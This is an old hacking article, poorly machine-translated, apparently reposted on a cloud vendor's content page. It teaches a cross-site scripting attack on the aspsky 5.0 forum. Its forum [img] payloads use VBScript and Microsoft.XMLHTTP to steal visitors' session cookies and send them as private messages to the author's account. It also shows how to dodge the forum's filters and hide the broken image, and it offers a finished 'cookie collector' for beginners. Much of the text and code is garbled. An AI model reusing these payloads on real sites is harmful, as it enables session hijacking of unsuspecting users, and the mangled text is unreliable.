Use the Microsoft. XMLHTTP Control to send cookies

Source: Internet
Author: User
Tags send cookies

Author: czy <>
Date: 2003-09-03

(Note thatArticleSo it is best
Http:// the article

You may already be familiar with cross-site scripting attacks, but there is always
Problem: Always Use window. Open to play a form and then send the cookie. This is a secret.
This is a big discount. I used to think about how to use the insertadjacenthtml method to inject HTML statements on the webpage.
The method barely allows sending the cookie without the IE window, but sometimes the IE error occurs in actual use.

Is there any better way? A Microsoft. XMLHTTP
Control (this control is a default built-in control of Win98/2 K, and it is considered safe by IE !), Through it we
You can send an HTTP request to a website on a webpage, either post or get.

The idea has come here. Let's take a look at it. I will use aspsky 5.0 0320 as an example.
We know that you can write VBScript in SRC: such a statement .. For example
but we can only execute one statement, such
this will all be wrong!
What should I do? In vbs, we can use the execute statement. In JS, we can use the eval language!
For example:

Not Dizzy yet, right? You may notice that when using the execute Statement of vbs, the double quotation marks must be replaced with "This is because:
In vbs, single quotes must enclose strings. They must be two single quotes that represent one quotation mark and are enclosed in double quotes!
Therefore, in the execute statement, we cannot use single quotation marks, but directly use ". When HTML matches the quotation marks
It will match the quotation marks after src = ", so we can only use" instead.

The problem of quotation marks is solved. In actual application, aspsky will also process our code:
1: If a script string is found, a space is added to the front.
2: If an HTTP string is found to be a URL, add the <A> element on both sides.
3: If space is found, it will be replaced

1: VBScript is replaced by VBScript
2: replace HTTP with HT + TP... (more than one pair of APP in quotation marks in vbs, and + represents a connector)
3: Use spaces instead (Note No)

The last question is about sending cookies:
1: The control can get or post any website locally, but only
Get, post the current server .... Otherwise, ie will reject the questions!
2: The cookie cannot contain & and other characters with special comments in the URL.


1: it can only be sent to the current server, so you can send the cookie to your registered user's mailbox on the Forum :)
2: replace (document. Cookie, &,-), used in vbs
Replace is used. In this example, I Replace "&" "-"

The problem is solved as follows:
The aspsky 5.0 0320 test is successful.


[Img] vbsrept: Execute (DAT = Replace (document. cookie, &,-): sethttp = Createobject (Microsoft. XMLHTTP): HTTP. openget, HT + TP: // Action = Send & touser = czy & Title = News & submit = Send & message = & dat, false: http. Send) [/img]

Note: Send the cookie to the czy user and the mail title is "news ".

In addition, the normal usage of the control is as follows:
<Script language = vbs>
Dat = Document. Cookie
Set HTTP = Createobject ("Microsoft. XMLHTTP ")
HTTP. Open "Post", " Cook = "& dat, false
HTTP. Send
Tt = http. responsetext
Msgbox TT

Make the code more perfect. Now the cookie is in our mailbox, but there is a small problem because the image is not
If the image is displayed normally, it will be a cross, and there will be a prompt to browse the image in the new window... This will inevitably make people

All IMG elements in a webpage can be illustrated by document. imanges and their size can be set. When width is 0
It is equivalent to hidden. You can determine whether the src attribute value of the element contains "ript" to see if it is our image.
The value greater than the identifier is replaced by 0!

[Img] vbsrept: Execute (foreachaaindocument. Images: ifinstr (AA. SRC, ript) then: AA. width = 0: endif: Next) [/img]

Actual application code:
[Img] vbsrept: Execute (foreachaaindocument. images: ifinstr (AA. SRC, ript) then: AA. width = 0: endif: Next: DAT = Replace (document. cookie, &,-): sethttp = Createobject (Microsoft. XMLHTTP): HTTP. openget, HT + TP: // Action = Send & touser = czy & Title = alll & submit = Send & message = & dat, false: http. Send) [/img]

// ------------------- Convenient for cainiao :)Aspsky 5.0 0320 cooki collector -- czy </P> <p>

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.